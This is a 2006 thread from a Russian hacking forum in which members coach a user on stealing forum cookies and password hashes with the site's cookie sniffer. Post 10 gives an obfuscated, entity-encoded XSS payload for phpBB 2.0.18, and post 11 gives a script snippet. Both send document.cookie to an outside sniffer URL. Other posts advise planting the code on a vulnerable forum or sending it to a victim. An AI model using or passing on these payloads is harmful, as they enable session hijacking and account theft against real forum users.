On line snifer Античата!???

Discussion in 'Уязвимости' started by slider, 21 Mar 2006.

Thread Status:
Not open for further replies.
  1. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Как исполь зовать снифер анти чата?
    Неполучается не присылаеет ХЭШ от форума
    Тока ип и сайт!??
     
  2. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
  3. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
    www.antichat.ru/sniff/ почитай тут или скачай видео про XSS. наверняка делаешь что-то не так.
     
  4. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
  5. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Может кто пример привести??
     
  6. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
    Может что то с куками нао делать?
    ПРИМЕР ПЛИЗЗ!
     
  7. TTyck

    TTyck Elder - Старейшина

    Joined:
    12 Nov 2005
    Messages:
    91
    Likes Received:
    41
    Reputations:
    11
    чтоб получить Md5 хеш, грубо говоря, надо сслыку на сниффер внедрить в сам форум, а не дать ссылку (получится тока в том случае если форум уязвим). Об уязвимостях есть куча статей, ищи и найдешь.
     
  8. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Ну вот почитай здесь например про уязвимости форумов там описаана XSS и какие коды вставлять в форум я думаю расписано понятно попробуй подправь коды под себя и попробуй кому нибудь отослать данное сообщение с этим кодом...
    http://forum.antichat.ru/thread15678.html
    http://forum.antichat.ru/thread12610.html
     
    _________________________
  9. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Просто кто нить пример может написать?
     
  10. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    420
    Reputations:
    280
    Бля ну в тех же 2х топиках там примеров валом что я давал и для разных убираеш * где поставлены в коде и всавляеш в форум и всё....
    Вот XSS для phpBB 2.0.18 вставляй в форум только убери * и куки придут на снифер античата...
    Code:
    [UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]
     
    _________________________
    #10 Nova, 21 Mar 2006
    Last edited: 21 Mar 2006
  11. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    <html>
    ....
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    ....
    </html>
    типа такого должно быть в исходниках страницы.
    А вообще, хочется сказать "закрываю тему", но не могу, прав не хватает... ;)
     
  12. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    пля, не могу понять, тут литературы и постов на dvd не влезет, а ты тут с 04.09.2005 и так и не смог прочитать иль разобратся???
    Не ленитесь искать пля, иль это привилегия только избранных, просто пропарсить и отложить в мозг парочку тем и заметок с форума, иль просто воспользоватся поиском??

    podkashey, спс, ты прав. Я б даж с удовольствием в топку, но.....CLOSED!
     
    1 person likes this.
Thread Status:
Not open for further replies.